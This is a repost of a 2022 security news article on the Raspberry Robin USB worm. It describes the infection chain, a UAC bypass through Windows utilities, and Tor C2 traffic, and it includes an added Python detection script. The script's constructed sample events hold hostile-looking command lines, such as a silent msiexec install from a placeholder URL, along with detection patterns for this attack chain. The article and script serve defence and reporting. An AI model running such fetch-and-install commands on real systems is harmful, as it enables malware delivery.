
Cyber Security And Bitcoin Blockchain News


Researchers Warn of ‘Raspberry Robin’ Malware Spreading via External Drives

Posted on May 6, 2022 By root


Cybersecurity researchers have discovered a new Windows malware with worm-like capabilities that is propagated by means of removable USB devices.

Attributing the malware to a cluster named “Raspberry Robin,” Red Canary researchers noted that the worm “leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.”

The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to technology and manufacturing sectors.

Attack chains pertaining to Raspberry Robin start with connecting an infected USB drive to a Windows machine. Present within the device is the worm payload, which appears as a .LNK shortcut file to a legitimate folder.


The worm then takes care of spawning a new process using cmd.exe to read and execute a malicious file stored on the external drive.

This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for external network communication to a rogue domain for command-and-control (C2) purposes and to download and install a DLL library file.

The malicious DLL is subsequently loaded and executed using a chain of legitimate Windows utilities such as fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe, effectively bypassing User Account Control (UAC).

Also common across Raspberry Robin detections is the presence of outbound C2 contact involving the processes regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses associated with Tor nodes.
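The stages described above can be turned into a simple host-level correlation over process and network telemetry. The following is an added example, not code from Red Canary or the original article; the event field names, the drive-letter set, the Tor node list and all sample events are constructed assumptions.

```python
import re
from collections import defaultdict
from ntpath import basename  # splits Windows paths on any OS

C2_PROCS = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}

def classify(ev, removable, tor_nodes):
    """Map one event to the stage of the chain it matches, or None."""
    image = basename(ev.get("image", "")).lower()
    parent = basename(ev.get("parent_image", "")).lower()
    cmdline = ev.get("command_line", "")
    if ev["type"] == "network":
        hit = image in C2_PROCS and ev.get("dest_ip") in tor_nodes
        return "tor_c2" if hit else None
    if image == "cmd.exe" and any(
            re.search(rf"\b{d}:\\", cmdline, re.I) for d in removable):
        return "cmd_reads_removable_drive"
    if image == "msiexec.exe" and re.search(r"https?://", cmdline, re.I):
        return "msiexec_remote_install"
    if image in {"rundll32.exe", "odbcconf.exe"} and parent in {
            "fodhelper.exe", "rundll32.exe"}:
        return "lolbin_uac_chain"
    return None

def triage(events, removable, tor_nodes, min_stages=2):
    """Return {host: sorted stages} for hosts showing >= min_stages stages."""
    seen = defaultdict(set)
    for ev in events:
        stage = classify(ev, removable, tor_nodes)
        if stage:
            seen[ev["host"]].add(stage)
    return {h: sorted(s) for h, s in seen.items() if len(s) >= min_stages}

# Constructed sample telemetry (hypothetical hosts, placeholder addresses).
TOR_NODES = {"203.0.113.10"}   # documentation-range stand-in for a Tor node list
REMOVABLE = {"E"}              # drive letters known to be USB media (assumption)
SYS = "C:\\Windows\\System32\\"
EVENTS = [
    {"host": "WS-01", "type": "process", "image": SYS + "cmd.exe",
     "command_line": r"cmd.exe /c E:\constructed.dat"},
    {"host": "WS-01", "type": "process", "image": SYS + "msiexec.exe",
     "command_line": "msiexec.exe /q /i http://example.invalid/constructed"},
    {"host": "WS-01", "type": "process", "image": SYS + "rundll32.exe",
     "parent_image": SYS + "fodhelper.exe", "command_line": "rundll32.exe"},
    {"host": "WS-01", "type": "network", "image": SYS + "dllhost.exe", "dest_ip": "203.0.113.10"},
    {"host": "WS-02", "type": "process", "image": SYS + "msiexec.exe",
     "command_line": "msiexec /i https://example.invalid/constructed.msi"},
    {"host": "WS-03", "type": "network", "image": SYS + "rundll32.exe", "dest_ip": "198.51.100.7"},
]
```

Requiring at least two distinct stages per host keeps a lone URL-based msiexec.exe install, which administrators also perform, from being flagged on its own.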

That said, the operators’ objectives remain unanswered at this stage. It’s also unclear how and where the external drives are infected, although it’s suspected that it’s carried out offline.

“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”





TheHackersNews/
